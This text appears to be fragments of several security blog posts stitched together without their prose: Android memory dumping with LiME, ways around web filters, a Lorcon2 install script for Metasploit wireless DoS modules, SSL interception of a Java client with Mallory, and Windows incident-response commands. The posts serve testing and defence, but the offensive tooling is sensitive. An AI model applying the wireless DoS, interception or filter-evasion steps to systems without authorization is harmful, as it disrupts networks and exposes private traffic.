$ adb shell ps  
$ adb shell netstat  
$ adb shell logcat  

Figure 1 – Listing running processes on the Android emulator via adb

Figure 2 – Dumping the contents of the com.android.email process via ddms

GETTING READY TO ROCK

• Android SDK: http://developer.android.com/sdk/index.html
• Android NDK: http://developer.android.com/sdk/ndk/index.html

~/android-sdk-linux
~/android-ndk-r7c

 $ repo init -u https://android.googlesource.com/platform/manifest

$ repo sync

$ source build/envsetup.sh

 $ lunch full-eng

BUILDING THE CUSTOM ANDROID KERNEL

$ git clone https://android.googlesource.com/kernel/goldfish.git ~/source/kernel/goldfish/goldfish

export USE_CCACHE=1

export PATH=$PATH:~/android-sdk-linux/tools/
export PATH=$PATH:~/android-sdk-linux/platform-tools/
export ANDROID_SWT=~/android-sdk-linux/tools/lib/x86_64/
export ANDROID_JAVA_HOME=/usr/lib/jvm/jdk1.6.0_31
export JAVA_HOME=/usr/lib/jvm/jdk1.6.0_31
export CCOMPILER=~/android-ndk-r7c/toolchains/arm-linux-androideabi-4.4.3/prebuilt/linux-x86/bin/arm-linux-androideabi-

$ cd ~/android-sdk-linux/platform-tools    
$ ./adb pull /proc/config.gz
$ gunzip ./config.gz
$ cp config ~/source/kernel/goldfish/.config

CONFIG_MODULES=y
CONFIG_MODULE_UNLOAD=y
CONFIG_MODULE_FORCE_UNLOAD=y

$ make ARCH=arm CROSS_COMPILE=$CCOMPILER EXTRA_CFLAGS=-fno-pic modules_prepare

$ emulator -avd Demo -kernel ~/source/kernel/goldfish/arch/arm/boot/zImage  -show-kernel –verbose

OBTAINING AND COMPILING LIME

obj-m := lime.o

KDIR_GOLD := ~/source/kernel/goldfish/

KVER := $(shell uname -r)

PWD := $(shell pwd)
CCPATH := ~/android-ndk-r7c/toolchains/arm-linux-androideabi-4.4.3/prebuilt/linux-x86/bin

default:
 # cross-compile for Android emulator 
 $(MAKE) ARCH=arm CROSS_COMPILE=$(CCPATH)/arm-linux-androideabi- EXTRA_CFLAGS=-fno-pic -C $(KDIR_GOLD) M=$(PWD) modules
 mv lime.ko lime-goldfish.ko
 
 # compile for local system
 $(MAKE) -C /lib/modules/$(KVER)/build M=$(PWD) modules
 mv lime.ko lime-$(KVER).ko
 
 make tidy

tidy:
 rm -f *.o *.mod.c Module.symvers Module.markers modules.order \.*.o.cmd \.*.ko.cmd \.*.o.d
 rm -rf \.tmp_versions

clean:
 make tidy
 rm -f *.ko

$ make

before moving on.

In the second part of this post we will look at how to use this Loadable Kernel Module to dump the full contents of RAM of an Android device and what kind of information can be retrieved from this capture.

About the Author

Ismael Valenzuela (GCFA, GREM, GCIA, GCIH, GPEN, GWAPT, GCWN, GCUX, CISSP, CISM, 27001 Lead Auditor & ITIL Certified) works as a Principal Architect at McAfee Foundstone Services EMEA. Find him on twitter at @aboutsecurity or at http://blog.ismaelvalenzuela.com

• http://en.wikipedia.org/wiki/Internet_censorship_circumvention#Software
• http://www.nartv.org/mirror/circ_guide.pdf
• http://www.zensur.freerk.com/#4

URL Canonicalization

Alternative Domains

1. https://www.facebook.com/ (Sometimes HTTPs version of the site is not blocked)
2. http://Facebook.com
3. http://Facebook.com/
4. http://Facebook.com.
5. http://Login.facebook.com
6. http://touch.facebook.com
7. http://M.facebook.com (Access the mobile version of Facebook instead)
8. http://Apps.facebook.com
9. http://Register.facebook.com

Alternate Representations

1. Try accessing Facebook using the IP address: http://66.220.147.44
2. Decimal format of the IP address 66.220.147.44 : http://1121751852
3. Hexadecimal format of the IP address: http://0xd42dc932c/
4. Dotted Hexadecimal form: http://0x42.0xdc.0x93.0x2c
5. Dotted Octal form: http://0102.0334.0223.0054

• http://www.allredroster.com/iptodec.htm
• http://ha.ckers.org/xss.html
• Windows Calculator! (Programmer View):
  
  

Translation Services

• http://www.online-translator.com/site_Translation.aspx?prmtlang=en
• http://lingro.com/
• http://www.tranexp.com:2000/InterTran?from=eng&to=eng&type=url

Cached Pages and Mirror Sites

Low-Bandwidth Simulators

Proxy Websites

Web to email

• http://www.www4mail.org/
• http://www.web2mail.com/
• http://www.emailtheweb.com/

Web to PDF

• http://www.web2pdfconvert.com/
• http://www.html-to-pdf.net/free-online-pdf-converter.aspx
• http://pdfcrowd.com/
• http://www.pdfonfly.com/
• http://pici.picidae.net/(Provides website to screenshot conversion)

RSS Aggregators

Google Add-ons

Non-Standard Web Browsers

• Bitty Browser
  
  


• Dejavu Emulator provides seven different browser emulators that can be used to access banned sites.
  
  


• Opera Mini Simulator
  
  


• iPhone Simulator (iphonetester.com)


• Android Emulator


• Blackberry Simulator

Accessing Blocked Instant Messengers

• http://www.iloveim.com/
• http://www.ebuddy.com/
• http://www.koolim.com/

 $ sudo bash  
 # cd /opt/metasploit3/msf3/external/ruby-lorcon2/  
 # svn co http://802.11ninja.net/svn/lorcon/trunk lorcon2  
 # cd lorcon2  
 # ./configure --prefix=/usr && make && make install  
 # cd ..  
 # ruby extconf.rb  
 # make && make install  

libnl-dev

 apt-get install libnl-dev 

Troubleshooting test.rb

 driver = STR2CSTR(rbdriver);

intf = STR2CSTR(rbintf);

 driver = StringValuePtr(rbdriver);

intf = StringValuePtr(rbintf);

Couple More Ruby Issues

Its working! (not completely)

 "\x03" + "\x01" +
channel.chr

 "\x03" + "\x01" +
datastore['CHANNEL'].to_i.chr 

It works! (for real now)

auxiliary/dos/wifi/netgear_ma521_rates         NetGear MA521 Wireless Driver
Long Rates Overflow

auxiliary/dos/wifi/netgear_wg311pci           NetGear WG311v1 Wireless
Driver Long SSID Overflow 

auxiliary/dos/wifi/ssidlist_beacon             Wireless
Beacon SSID Emulator

auxiliary/fuzzers/wifi/fuzz_beacon Wireless Beacon Frame
Fuzzer auxiliary/fuzzers/wifi/fuzz_proberesp  Wireless Probe Response Frame Fuzzer

 #!/bin/bash

# Script to install Lorcon2 on Backtrack 5 R2
# By Robert Portvliet
# Foundstone

# Set up variables
msfwifi_dir="/opt/metasploit/msf3/modules/auxiliary/dos/wifi/"
rubylorcon_dir="/opt/metasploit/msf3/external/ruby-lorcon2/"
msfuzz_dir="/opt/metasploit/msf3/modules/auxiliary/fuzzers/wifi/"

echo "[*] This script will install Lorcon2 on Backtrack 5 R2"

echo "[*] Install libnl netlink library"
apt-get install libnl-dev

echo "[*] Downloading Lorcon2 from SVN"
svn co http://802.11ninja.net/svn/lorcon/trunk lorcon2

echo "[*] Copying Lorcon2 to MSF"
cp -r ./lorcon2 $rubylorcon_dir

echo "[*] Fixing MSF wireless modules"
sed -i 's/+ channel.chr/+ datastore['\''CHANNEL'\''].to_i.chr/g' $msfwifi_dir/ssidlist_beacon.rb
sed -i 's/+ channel.chr/+ datastore['\''CHANNEL'\''].to_i.chr/g' $msfwifi_dir/netgear_*
sed -i 's/+ channel.chr/+ datastore['\''CHANNEL'\''].to_i.chr/g' $msfuzz_dir/*.rb 
sed -i 's/Lorcon/Lorcon2/g' $msfwifi_dir/ssidlist_beacon.rb

echo "[*] Fixing Ruby-Lorcon2 before building"
sed -i 's/STR2CSTR/StringValuePtr/g' $rubylorcon_dir/Lorcon2.c

echo "[*] Building Lorcon2"
cd $rubylorcon_dir/lorcon2
./configure --prefix=/usr && make && make install

cd ..

echo "[*] Building Ruby-Lorcon2"
ruby ./extconf.rb && make && make install

echo "[*] Copying Lorcon2 libraries into Metasploit"
cp $rubylorcon_dir/Lorcon2.so /opt/metasploit/ruby/lib/ruby/site_ruby/1.9.1/i686-linux/
cp /usr/lib/liborcon2* /opt/metasploit/msf3/lib/

echo "[*] Finished, fire up a wireless module and see if it works"

Boot Strap Loading and cache/no cache Files

• https://www.xyz.com/testapp/9E871855826913D91F95F8F65F4ED9E3.cache.html
• https://www.xyz.com/testapp/C2C2D9E9AB0BBFD8B66FD43702FAF3B5.cache.html

 functionjy(b,c,d,e,f){[..snip..]  
 !!$stats&&$stats({moduleName:$moduleName,sessionId:$sessionId,subSystem:TG,evtGroup:j,method:oI,millis:(new Date).getTime(),type:WH});  
 k=vr(b);try{lr(k.b,oF+Oq(k,pI)); lr(k.b,oF+Oq(k,qI)); lr(k.b,ZH);lr(k.b,oF+Oq(k,$H));lr(k.b,oF+Oq(k,$H));  
 lr(k.b,oF+Oq(k,rI));lr(k.b,oF+Oq(k,c));lr(k.b,oF+Oq(k,d));lr(k.b,oF+e);i=jr(k);[..snip..]wr(b,(cs(),oI),j,i,f)  

Client Side Code

• degwt is a utility that de-obfuscates GWT generated java script code. You can find an example on the tool's website at http://code.google.com/p/degwt/
• RPC methods can also be enumerated using tools like GWTEnum, available from http://blog.gdssecurity.com/labs/2010/7/20/gwtenum-enumerating-gwt-rpc-method-calls.html

Authorization and other Issues

References

• http://blog.gdssecurity.com
• http://code.google.com/webtoolkit

1. The client itself is out-of-scope, so only findings that apply to the API can be reported;
2. The thick client is using the FIX protocol over TCP; and
3. The TCP Stream is SSL encrypted.

Mallory Initial Setup

• 3 Network Interface Cards with each set to Bridged
• 1024 MB of RAM
• 10 GB of hard disk space
• A user named “mallory”

 $ sudo ifconfig eth0 down  
 $ sudo ifconfig eth2 down  
 $ ping 8.8.8.8                     #test the connection  

Figure 1: Turning off two interfaces and testing the connection with ping.

 $ wget https://bitbucket.org/IntrepidusGroup/mallory/downloads/mallory_install.sh
 $ chmod +x mallory_install.sh
 $ sudo ./mallory_install.sh
 $ sudo ./mallory_install.sh
 **a lot of text later (go grab some tea/coffee)**
 /home/mallory/mallory  #folder to place mallory in
 *hit enter for yes*
 $ cd /home/mallory/mallory/current/src/

Figure 2: Downloading and running the Mallory install script.

Figure 3: Finishing the install script and changing into the new directory.

Routing Traffic

# First
allow manual interface configuration
$ sudo service network-manager stop
$ sudo killall –w dhclient

Figure 4: Stopping the network manager service and any dhclient processes.

$ sudo vi /etc/network/interfaces

Figure 5: Configuration settings for /etc/network/interfaces.

$ sudo ifup eth0
$ sudo ifup eth0
$ sudo ifup eth2
$ ifconfig   # Check the configuration

Figure 6: Turning on the interfaces with "ifup" and checking their settings with "ifconfig".

$ sudo apt-get install dnsmasq
$ sudo /etc/init.d/dnsmasq stop
$ sudo /etc/init.d/dnsmasq start -i eth2

Figure 7: Install dnsmasq with apt-get then stop and start the daemon on eth2.

$ sudo ifdown eth1
$ sudo killall -w dhclient
$ sudo ifup eth1

Figure 8: Windows network configuration for testing VM

 $ sudo ifconfig eth0 inet 10.0.0.2 netmask 255.255.255.0
$ sudo route add default gw 10.0.0.1
$ echo “nameserver 10.0.0.3” | sudo tee /etc/resolv.conf

Intercepting Traffic

Terminal 1, Worker Mode:

$ cd /home/mallory/mallory/current/src
$sudo python mallory.py

Figure 9: Starting mallory.py for the first time.

Terminal 2, GUI Mode:

$ cd /home/mallory/mallory/current/src
$ sudo python launchgui.py

Figure 10: Executing the launchgui.py script and the GUI started.

Figure 11: Start the MiTM and outbound interfaces settings.

;http_1:http.HTTP:80

http_1:http.HTTP:80

Figure 12: Apply the HTTP protocol MiTM.

Figure 13: www.google.com, with the doodle flipped and inverted by Mallory.

Decrypting SSL Traffic

;http_1:http.HTTP:80

ssl:sslproto.SSLProtocol:443

Figure 14: Starting SSL MiTM in Mallory.

Figure 15: Starting the "Debug All" rule.

Figure 16: Mallory has captured an HTTP request sent via SSL to 74.125.224.82 – google.com – on port 443.

FIX over SSL

fixssl:sslproto.SSLProtocol:32001

Figure 17: Client refusing the SSL handshake.

• The thick client had a configuration file with an application-specific trust store called “client_truststore”:

  <ssl dir="config"
  trustStoreFile="client_truststore">

  However, this trust store is password-protected, so adding a certificate is non-trivial.
• The Java Runtime Engine installed on most systems has a system-wide trust store file. On my system, this file lived in:

  C:\Program Files\Java\jre6\lib\security\cacerts

  This trust store is also password protected, but the password is ‘changeit’. Obviously, nobody changed it.

1. Mallory’s CA certificate, named “ca.cer”(from /home/mallory/mallory/current/src/ca/ca.cer)
2. The system trust store file, named “cacerts” (from C:\Program Files\Java\jre6\lib\security\cacerts)
3. The Java ‘Keytool’ application (from C:\Program Files\Java\jre6\bin)

“C:\Program Files\Java\jre6\bin\keytool.exe” –import –alias malloryca –file ca.cer –keystore cacerts –storepass changeit

Trust this certificate? [no]: yes

Figure 18: Adding certificate to keystore

<ssl dir=”config” trustStoreFile=”cacerts”>

Figure 19: Mallory performing a MiTM on SSL encrypted FIX traffic.

Recap

• Setup and configured Mallory;
• Routed traffic through Mallory, both HTTP and HTTPS;
• Added a custom certificate to a keystore and successfully MiTM’ed a java thick client; and
• Successfully decoded and intercepted the FIX protocol.

• http://www.consumerfraudreporting.org/phishingchase.php
• http://www.millersmiles.co.uk/email/please-restore-your-account-access-chase-22978
• http://419.bittenus.com/phishing/chase.htm
• http://antifraudintl.org/showthread.php?62796-JP-Morgan-Chase-2012

Indicators of Compromise Covered

• Processes
• Network Connections
• Common File Locations
  • System32
  • Home Directory
• Persistence Mechanisms
  • Services
  • Registry
  • Tasks
  • Startup Directory

Examine Processes

tasklist >> output.txt

C:\>tasklist

Image Name                   PID Session Name     Session#    Mem Usage
========================= ====== ================ ======== ============
System Idle Process            0 Console                 0         16 K
System                         4 Console                 0        212 K
smss.exe                     604 Console                 0        404 K
csrss.exe                    652 Console                 0      1,996 K
winlogon.exe                 676 Console                 0      3,468 K
services.exe                 720 Console                 0      3,368 K
lsass.exe                    732 Console                 0      5,972 K
svchost.exe                  892 Console                 0      4,764 K
svchost.exe                  960 Console                 0      4,164 K
svchost.exe                 1072 Console                 0     19,276 K
svchost.exe                 1132 Console                 0      3,484 K
svchost.exe                 1272 Console                 0      3,064 K
explorer.exe                1408 Console                 0     15,252 K
VMwareUser.exe              1648 Console                 0      2,888 K
ctfmon.exe                  1660 Console                 0      3,004 K
wracing.exe                 1680 Console                 0      1,220 K
sqlmangr.exe                1692 Console                 0      4,804 K
svchost.exe                 1808 Console                 0      3,700 K
inetinfo.exe                1864 Console                 0      7,904 K
sqlservr.exe                1880 Console                 0      7,768 K
VMwareService.exe            128 Console                 0      2,236 K
alg.exe                     1168 Console                 0      3,536 K
cmd.exe                     1928 Console                 0      2,836 K
defrag.exe                  1396 Console                 0      3,304 K
dfrgntfs.exe                1260 Console                 0      9,556 K
wmiprvse.exe                1756 Console                 0      5,876 K
firefox.exe                  380 Console                 0     24,852 K
tasklist.exe                1284 Console                 0      4,312 K

Examine Network Connections

netstat -ano >> output.txt

C:\>netstat -ano

Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:21             0.0.0.0:0              LISTENING       1864
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       1864
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       960
  TCP    0.0.0.0:443            0.0.0.0:0              LISTENING       1864
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:1029           0.0.0.0:0              LISTENING       1864
  TCP    127.0.0.1:1030         0.0.0.0:0              LISTENING       1168
  TCP    127.0.0.1:1737         127.0.0.1:1738         ESTABLISHED     380
  TCP    127.0.0.1:1738         127.0.0.1:1737         ESTABLISHED     380
  TCP    127.0.0.1:1741         127.0.0.1:1742         ESTABLISHED     380
  TCP    127.0.0.1:1742         127.0.0.1:1741         ESTABLISHED     380
  TCP    192.168.200.53:139     0.0.0.0:0              LISTENING       4
  TCP    192.168.200.53:1743    74.125.239.18:80       ESTABLISHED     380
  TCP    192.168.200.53:1745    74.125.239.18:80       ESTABLISHED     380
  TCP    192.168.200.53:1746    72.235.63.10:80        ESTABLISHED     380
  TCP    192.168.200.53:1747    72.235.63.19:80        ESTABLISHED     380
  TCP    192.168.200.53:1749    74.125.239.6:80        ESTABLISHED     380
  TCP    192.168.200.53:1750    63.232.79.43:443       ESTABLISHED     1680
  UDP    0.0.0.0:445            *:*                                    4
  UDP    0.0.0.0:500            *:*                                    732
  UDP    0.0.0.0:3456           *:*                                    1864
  UDP    0.0.0.0:4500           *:*                                    732
  UDP    127.0.0.1:123          *:*                                    1072
  UDP    192.168.200.53:123     *:*                                    1072
  UDP    192.168.200.53:137     *:*                                    4
  UDP    192.168.200.53:138     *:*                                    

Examine Common File Locations

System32

dir /o:d /t:c c:\windows\system32 >> output.txt

C:\>dir /o:d /t:c c:\windows\system32
-snip-
01/07/2010  05:48 PM           689,152 xpsp3res.dll
01/07/2010  06:02 PM    <DIR>          en
01/07/2010  06:02 PM    <DIR>          scripting
01/07/2010  06:02 PM    <DIR>          en-us
01/07/2010  06:19 PM         1,676,288 xpssvcs.dll
01/07/2010  06:19 PM           575,488 xpsshhdr.dll
01/07/2010  06:19 PM           117,760 prntvpt.dll
01/07/2010  06:20 PM    <DIR>          XPSViewer
01/07/2010  06:34 PM             2,560 xpsp4res.dll
01/07/2010  07:39 PM        25,966,024 MRT.exe
01/07/2010  07:50 PM             3,706 TZLog.log
            2009 File(s)    408,261,849 bytes
              52 Dir(s)   2,505,060,352 bytes free

User’s home directory

dir /a /s /o:d /t:c “%USERPROFILE%” >> output.txt

dir /a /s /o:d /t:c "%USERPROFILE%"

-SNIP-
 Directory of C:\Documents and Settings\Administrator\Local Settings\Temp
01/07/2010  07:00 PM            54,272 Set29F.tmp
01/07/2010  07:42 PM    <DIR>          NDP1.1sp1-KB953297-X86
01/07/2010  07:47 PM            14,010 ASPNETSetup_00002.log
09/13/2010  09:24 PM             8,141 lick_me.jpg
09/13/2010  09:24 PM            37,376 wracing.exe
09/13/2010  09:24 PM            28,160 wracing.dll
09/13/2010  09:28 PM    <DIR>          plugtmp
03/23/2012  01:43 PM    <DIR>          VMwareDnD
03/23/2012  02:54 PM               104 pdracing.tmp
-SNIP-

Investigating Persistence

• Services
• Registry
• Scheduled Tasks
• Startup Directory

Examine Services

net start >> output.txt

C:\>net start
These Windows services are started:

   Application Layer Gateway Service
   Automatic Updates
   COM+ Event System
   Computer Browser
   Cryptographic Services
   DCOM Server Process Launcher
   DHCP Client
   Distributed Link Tracking Client
   DNS Client
   Event Log
   FTP Publishing
   Help and Support
   IIS Admin
   IPSEC Services
   Logical Disk Manager
   MSSQLSERVER
   Network Connections
   Network Location Awareness (NLA)
   Plug and Play
   Protected Storage
   Remote Access Connection Manager
   Remote Procedure Call (RPC)
   Remote Registry
   Secondary Logon
   Security Accounts Manager
   Security Center
   Server
   Shell Hardware Detection
   System Event Notification
   Task Scheduler
   TCP/IP NetBIOS Helper
   Telephony
   Terminal Services
   VMware Tools Service
   WebClient
   Windows Firewall/Internet Connection Sharing (ICS)
   Windows Management Instrumentation
   Windows Time
   Workstation
   World Wide Web Publishing

The command completed successfully.

tasklist /svc >> output.txt

C:\>tasklist /svc

Image Name                   PID Services
========================= ====== ============================================
System Idle Process            0 N/A
System                         4 N/A
smss.exe                     604 N/A
csrss.exe                    652 N/A
winlogon.exe                 676 N/A
services.exe                 720 Eventlog, PlugPlay
lsass.exe                    732 PolicyAgent, ProtectedStorage, SamSs
svchost.exe                  892 DcomLaunch, TermService
svchost.exe                  960 RpcSs
svchost.exe                 1072 Browser, CryptSvc, Dhcp, dmserver,
                                 EventSystem, helpsvc, lanmanserver,
                                 lanmanworkstation, Netman, Nla, RasMan,
                                 Schedule, seclogon, SENS, SharedAccess,
                                 ShellHWDetection, TapiSrv, TrkWks, W32Time,
                                 winmgmt, wscsvc, wuauserv
svchost.exe                 1132 Dnscache
svchost.exe                 1272 LmHosts, RemoteRegistry
explorer.exe                1408 N/A
VMwareUser.exe              1648 N/A
ctfmon.exe                  1660 N/A
wracing.exe                 1680 N/A
sqlmangr.exe                1692 N/A
svchost.exe                 1808 WebClient
inetinfo.exe                1864 IISADMIN, MSFtpsvc, W3SVC
sqlservr.exe                1880 MSSQLSERVER
VMwareService.exe            128 VMTools
alg.exe                     1168 ALG
cmd.exe                     1928 N/A
firefox.exe                  380 N/A
notepad.exe                 1344 N/A
tasklist.exe                1820 N/A
wmiprvse.exe                1892 N/A

sc qc  >> output.txt

C:\>sc qc webclient
[SC] GetServiceConfig SUCCESS

SERVICE_NAME: webclient
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\WINDOWS\System32\svchost.exe -k LocalService
        LOAD_ORDER_GROUP   : NetworkProvider
        TAG                : 0
        DISPLAY_NAME       : WebClient
        DEPENDENCIES       : MRxDAV
        SERVICE_START_NAME : NT AUTHORITY\LocalService

Examine Registry Entries

reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
reg query "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run"
reg query "HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components"
reg query "HKLM\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components"
reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Run"

C:\>reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Run"

! REG.EXE VERSION 3.0

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    ctfmon.exe  REG_SZ  C:\WINDOWS\system32\ctfmon.exe
    wracing     REG_SZ  C:\Documents and Settings\Administrator\Local Settings\Temp\wracing.exe -installkys

Examine Scheduled Tasks

at >> output.txt

C:\>at
There are no entries in the list.

schtasks >> output.txt

C:\Documents and Settings\Administrator>schtasks

TaskName                            Next Run Time          Status
=================================== ====================== ===============
Ezyme                               16:33:00, 3/23/2012

Examine Startup Directory

dir “C:\Documents and Settings\All Users\Start Menu\Programs\Startup”
dir “C:\Documents and Settings\\Start Menu\Programs\Startup”
dir "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"

C:\>dir "c:\documents and settings\Administrator\start menu\programs\startup"
 Volume in drive C has no label.
 Volume Serial Number is 442E-ACB9

 Directory of c:\documents and settings\Administrator\start menu\programs\startup

11/15/2006  01:37 PM    <DIR>          .
11/15/2006  01:37 PM    <DIR>          ..
11/15/2006  01:37 PM               607 putbginfo.bat.lnk
               1 File(s)            607 bytes
               2 Dir(s)   2,503,716,864 bytes free

Initial Analysis of the Results

Image Name                   PID Session Name     Session#    Mem Usage
========================= ====== ================ ======== ============
wracing.exe                 1680 Console                 0      1,220 K

  TCP    192.168.200.53:1750    63.232.79.43:443       ESTABLISHED     1680

C:\Documents and Settings\Administrator\Local Settings\Temp

09/13/2010  09:24 PM             8,141 lick_me.jpg
09/13/2010  09:24 PM            37,376 wracing.exe
09/13/2010  09:24 PM            28,160 wracing.dll

"HKCU\Software\Microsoft\Windows\CurrentVersion\Run"
wracing     REG_SZ  C:\Documents and Settings\Administrator\Local Settings\Temp\wracing.exe -installkys

C:\Documents and Settings\Administrator>schtasks
TaskName                            Next Run Time          Status
=================================== ====================== ===============
Ezyme                               16:33:00, 3/23/2012

Food for Thought

What Native Tips Do You Have?

1. Fiddler does not have an “auto save” feature and as such if you do not explicitly save the session(s) then your session(s) are lost as soon as Fiddler is closed.
2. The “Save” functionality saves the captured sessions as a snapshot in time. So, if you explicitly save a Fiddler session, continue browsing the web application (being proxy'ed through Fiddler) and then exit Fiddler (without saving) all the new sessions that were captured after the previous “Save” operation are lost.
3. The “Load Archive” functionality loads and appends the user selected session archive to the already open and existing capture. Now if the “Save” operation is invoked then the current capture plus the existing session archive (that was loaded) is saved as a new session archive.

   
 static function OnShutdown() {  
      // MessageBox.Show("Fiddler has shutdown");  
      var exitPromptResult: DialogResult;  
             
      exitPromptResult = MessageBox.Show("Do you want to save this session before Fiddler exits?", "Save on Exit", MessageBoxButtons.YesNo, MessageBoxIcon.Warning, MessageBoxDefaultButton.Button1);  
             
      if (DialogResult.Yes != exitPromptResult)  
      {  
           //The user does not want to save the capture so proceed to exit  
           return;  
      }  
             
      //The user selected Yes - Allow the user to save the capture  
      FiddlerApplication.UI.actSelectAll();  
      FiddlerApplication.UI.actSaveSessionsToZip();  
 }  
   

• If you select “No” then the capture will not be saved and Fiddler will exit
• If you select “Yes” however select “Cancel” on the ensuing “Save Session Archive to…” dialog then the capture will not be saved and Fiddler will exit
• If you select “Yes” and enter an appropriate archive name and select “Save” on the ensuing “Save Session Archive to…” dialog then the capture will be saved to the appropriate archive.

Indicators of Compromise Covered

• Processes
• Network Connections
• Common File Locations
  • System32
  • Home Directory
• Persistence Mechanisms
  • Services
  • Registry
  • Tasks
  • Startup Directory

Examine Processes

pslist >> output.txt

C:\>pslist

pslist v1.29 - Sysinternals PsList
Copyright (C) 2000-2009 Mark Russinovich
Sysinternals

Process information for PC122:

Name                Pid Pri Thd  Hnd   Priv        CPU Time    Elapsed Time
Idle                  0   0   1    0      0     3:57:34.937     0:00:00.000
System                4   8  48  340      0     0:01:01.421     0:00:00.000
smss                604  11   3   19    168     0:00:00.031     4:05:30.375
csrss               652  13  12  375   1772     0:00:15.000     4:05:29.265
winlogon            676  13  17  547   7400     0:00:01.171     4:05:29.109
services            720   9  15  261   1664     0:00:03.859     4:05:28.609
lsass               732   9  22  357   3764     0:00:03.968     4:05:28.562
svchost             892   8  14  190   2888     0:00:01.156     4:05:27.890
svchost             960   8   7  235   1640     0:00:02.656     4:05:27.609
svchost            1072   8  67 1251  14668     0:00:20.593     4:05:27.406
svchost            1132   8   6   80   1272     0:00:02.156     4:05:26.875
svchost            1272   8   5   90   1196     0:00:02.781     4:05:26.625
explorer           1408   8   9  330  10304     0:00:15.421     4:05:25.578
VMwareUser         1648   8   1   26    888     0:00:01.000     4:05:23.937
ctfmon             1660   8   1   69    840     0:00:01.546     4:05:23.843
wracing            1680   8   1   19    324     0:00:41.609     4:05:23.687
sqlmangr           1692   8   2   76   1252     0:01:35.203     4:05:23.609
svchost            1808   8   5  107   1272     0:00:03.968     4:05:18.156
inetinfo           1864   8  18  269   3992     0:00:14.140     4:05:17.953
sqlservr           1880   8  21  214  13068     0:00:01.640     4:05:17.859
VMwareService       128  13   3   47    696     0:01:25.015     4:05:14.359
alg                1168   8   6  105   1132     0:00:01.656     4:05:11.046
cmd                1928   8   1   31   2264     0:00:07.937     3:58:41.046
firefox             380   8  12  343  19320     0:00:04.187     2:55:04.140
notepad            1344   8   1   45   1268     0:00:01.531     2:51:28.015
autoruns           1564   8   5  287  12564     0:00:41.437     2:34:45.015
pslist              696  13   2  115   1040     0:00:00.156     0:00:00.250

pslist -t >> output.txt

C:\>pslist -t

pslist v1.29 - Sysinternals PsList
Copyright (C) 2000-2009 Mark Russinovich
Sysinternals

Process information for PC122:

Name                             Pid Pri Thd  Hnd      VM      WS    Priv
Idle                               0   0   1    0       0      16       0
  System                           4   8  48  340    1884     212       0
    smss                         604  11   3   19    3808     404     168
      csrss                      652  13  12  375   25740    2144    1772
      winlogon                   676  13  17  547   51648    4188    7400
        services                 720   9  15  261   20220    3400    1664
          VMwareService          128  13   3   47   17764    2256     696
          svchost                892   8  14  190   59652    4728    2888
          svchost                960   8   7  235   33644    4148    1640
          svchost               1072   8  67 1251  138856   24388   14668
          svchost               1132   8   6   80   29572    3496    1272
          alg                   1168   8   6  105   32288    3536    1132
          svchost               1272   8   5   90   30980    3248    1196
          svchost               1808   8   5  107   35608    3700    1272
          inetinfo              1864   8  18  269   43944    7904    3992
          sqlservr              1880   8  21  214  559284    7768   13068
        lsass                    732   9  22  357   41392    6004    3764
explorer                        1408   8   9  330   81936   15356   10304
  firefox                        380   8  12  343   85196   29884   19320
  VMwareUser                    1648   8   1   26   27996    2888     888
  ctfmon                        1660   8   1   69   29208    3008     840
  sqlmangr                      1692   8   2   76   35200    4804    1252
  cmd                           1928   8   1   31   30848     980    2264
    pslist                       152  13   2  115   29292    2628    1040
    notepad                     1344   8   1   45   30304    3768    1268
    autoruns                    1564   8   5  287   96192   16500   12564
wracing                         1680   8   1   19    7480    1220     324

cmdline >> output.txt

C:\>cmdline
CmdLine - DiamondCS Freeware Console Tools (www.diamondcs.com.au)
---
Found 30 processes.

-snip-

C:\WINDOWS\system32\services.exe [720]
  C:\WINDOWS\system32\services.exe

C:\WINDOWS\system32\ctfmon.exe [1660]
  "C:\WINDOWS\system32\ctfmon.exe"

C:\Documents and Settings\Administrator\Local Settings\Temp\wracing.exe [1680]
  "C:\Documents and Settings\Administrator\Local Settings\Temp\wracing.exe"

C:\WINDOWS\system32\notepad.exe [1908]
  notepad test.txt

Examine Network Connections

cports /stext cportsoutput.txt

C:\>cports /stext cportsoutput.txt

-snip-
==================================================
Process Name      : wracing.exe
Process ID        : 1680
Protocol          : TCP
Local Port        : 1750
Local Port Name   : 
Local Address     : 192.168.200.53
Remote Port       : 443
Remote Port Name  : https
Remote Address    : 63.232.79.43
Remote Host Name  : 
State             : Established
Process Path      : C:\Documents and Settings\Administrator\Local Settings\Temp\wracing.exe
Product Name      : 
-snip-

Examine Common File Locations

System32

dir /o:d /t:c c:\windows\system32 >> output.txt

C:\>dir /o:d /t:c c:\windows\system32
-snip-
01/07/2010  05:48 PM           689,152 xpsp3res.dll
01/07/2010  06:02 PM    <dir>          en
01/07/2010  06:02 PM    <dir>          scripting
01/07/2010  06:02 PM    <dir>          en-us
01/07/2010  06:19 PM         1,676,288 xpssvcs.dll
01/07/2010  06:19 PM           575,488 xpsshhdr.dll
01/07/2010  06:19 PM           117,760 prntvpt.dll
01/07/2010  06:20 PM    <dir>          XPSViewer
01/07/2010  06:34 PM             2,560 xpsp4res.dll
01/07/2010  07:39 PM        25,966,024 MRT.exe
01/07/2010  07:50 PM             3,706 TZLog.log
            2009 File(s)    408,261,849 bytes
              52 Dir(s)   2,505,060,352 bytes free

User’s home directory

dir /a /s /o:d /t:c “%USERPROFILE%” >> output.txt

dir /a /s /o:d /t:c "%USERPROFILE%"

-SNIP-
 Directory of C:\Documents and Settings\Administrator\Local Settings\Temp
01/07/2010  07:00 PM            54,272 Set29F.tmp
01/07/2010  07:42 PM    <dir>          NDP1.1sp1-KB953297-X86
01/07/2010  07:47 PM            14,010 ASPNETSetup_00002.log
